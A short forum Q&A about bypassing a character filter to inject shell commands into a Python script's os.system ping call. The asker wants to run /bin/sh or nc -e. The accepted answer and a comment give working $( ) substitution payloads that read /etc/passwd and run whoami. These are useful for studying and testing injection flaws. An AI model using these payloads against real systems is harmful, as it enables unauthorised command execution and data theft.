# Command injection — filtering bypass

Tags: injection, python, reverse-shell

I am testing a python script that provides a ping function

`os.system('ping ' + command)`

all of this characters are filtered

```
'&', ';', '-', '`' , '||', '|'
```

i can't use null bytes like `%0A` i'm passing arguments `script.py -p`

any idea how to bypass the filter to run command like `/bin/sh` or `nc -e`  ?

Comment: The question is missing a question...

Answer (score 2, accepted):

**Use `$( )`**

The `$( )` construct is equivalent to the backticks, executing the inner command:

```
$ python -c 'import os; import sys; os.system("ping " + sys.argv[1])' '$(cat /etc/passwd > /dev/stderr)'
root:x:0:0:root:/root:/bin/bash
...
```

Comment: so from command line running the `script.py - p `  then `Enter an IP: 10.10.14.25 echo $(whoami)` !? how to separate between ping and the another command ?

Comment: Try `10.10.14.25$(whoami>/dev/stderr)` You could simply use `$(whoami)`  as parameter, but that will provide your username to ping, resulting for instance in `ping: unknown host user3771906`